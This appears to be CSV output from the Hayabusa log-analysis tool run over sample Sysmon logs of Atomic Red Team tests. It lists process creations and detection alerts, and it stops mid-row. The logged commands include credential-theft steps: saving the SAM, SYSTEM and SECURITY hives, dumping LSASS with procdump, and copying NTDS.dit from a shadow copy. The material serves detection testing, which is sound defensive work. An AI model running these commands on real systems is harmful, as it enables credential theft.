2019-07-19 23:57:53.882 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6168 | PGUID: 747F3D96-DA71-5D31-0000-00101A463F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:54.099 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1300 | PGUID: 747F3D96-DA72-5D31-0000-0010044F3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:54.129 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-DA72-5D31-0000-001056513F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,low,Evas,Indirect Command Execution,,rules/sigma/process_creation/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x50951 | PID: 3160 | PGUID: 747F3D96-DA72-5D31-0000-0010B1543F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:55.069 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1052 | PGUID: 747F3D96-DA73-5D31-0000-00106A8D3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:55.138 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe | LID: 0x50951 | PID: 4092 | PGUID: 747F3D96-DA73-5D31-0000-0010918F3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:55.236 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1724 | PGUID: 747F3D96-DA73-5D31-0000-001061933F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49734 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:09:40.973 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 4516 288 0000023C0CA1FA70 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3496 | PGUID: 747F3D96-DD34-5D31-0000-0010FCC64800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:09:43.329 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x50951 | PID: 5632 | PGUID: 747F3D96-DD37-5D31-0000-00109D4C4900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x50951 | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:10:52.700 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:10:52.700 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\3ivx11ib\3ivx11ib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5792 | PGUID: 747F3D96-DD8B-5D31-0000-001094584A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49744 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 5840 | Src PGUID: 747F3D96-DD47-5D31-0000-001015874900 | Tgt PID: 612 | Tgt PGUID: 747F3D96-D4A4-5D31-0000-00104A560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:16.986 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""gsecdump -a"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3920 | PGUID: 747F3D96-DD94-5D31-0000-0010F4864A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:17.027 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5476 | PGUID: 747F3D96-DD95-5D31-0000-0010148A4A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:17.107 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wce -o output.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5216 | PGUID: 747F3D96-DD95-5D31-0000-0010B38E4A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:17.149 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6264 | PGUID: 747F3D96-DD95-5D31-0000-0010D6914A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-DD95-5D31-0000-001075964A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\sam sam | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" | LID: 0x50951 | PID: 868 | PGUID: 747F3D96-DD95-5D31-0000-0010C7984A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4080 | PGUID: 747F3D96-DD99-5D31-0000-001069A34A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\system system | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" | LID: 0x50951 | PID: 1136 | PGUID: 747F3D96-DD99-5D31-0000-0010BBA54A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7164 | PGUID: 747F3D96-DD9B-5D31-0000-00106C1C4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\security security | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" | LID: 0x50951 | PID: 4464 | PGUID: 747F3D96-DD9B-5D31-0000-0010BE1E4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.549 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3016 | PGUID: 747F3D96-DD9E-5D31-0000-0010CB274B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Evas | CredAccess,Suspicious Use of Procdump on LSASS,,rules/sigma/process_creation/proc_creation_win_susp_procdump_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5488 | PGUID: 747F3D96-DD9E-5D31-0000-00106E2C4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Evas,Renamed ProcDump,,rules/sigma/process_creation/proc_creation_win_renamed_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Use of Procdump,,rules/sigma/process_creation/proc_creation_win_susp_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,low,ResDev,Usage of Sysinternals Tools,,rules/sigma/process_creation/proc_creation_win_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,medium,Evas,Procdump Usage,,rules/sigma/process_creation/proc_creation_win_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.686 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 264 | PGUID: 747F3D96-DD9E-5D31-0000-00109A2F4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 584 | PGUID: 747F3D96-DD9E-5D31-0000-001059374B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,high,Evas,Obfuscated Command Line Using Special Unicode Characters,,rules/sigma/process_creation/proc_creation_win_susp_char_in_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.884 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4208 | PGUID: 747F3D96-DD9E-5D31-0000-00106D3A4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.971 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-DD9E-5D31-0000-00100C3F4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: vssadmin.exe create shadow /for=C: | Process: C:\Windows\System32\vssadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" | LID: 0x50951 | PID: 6584 | PGUID: 747F3D96-DD9E-5D31-0000-00105E414B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.082 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3344 | PGUID: 747F3D96-DD9F-5D31-0000-00107B454B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5772 | PGUID: 747F3D96-DD9F-5D31-0000-00101A4A4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,high,CredAccess,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-DD9F-5D31-0000-00102D4D4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,high,CredAccess,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6508 | PGUID: 747F3D96-DD9F-5D31-0000-001041504B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE | Process: C:\Windows\System32\reg.exe | User: 
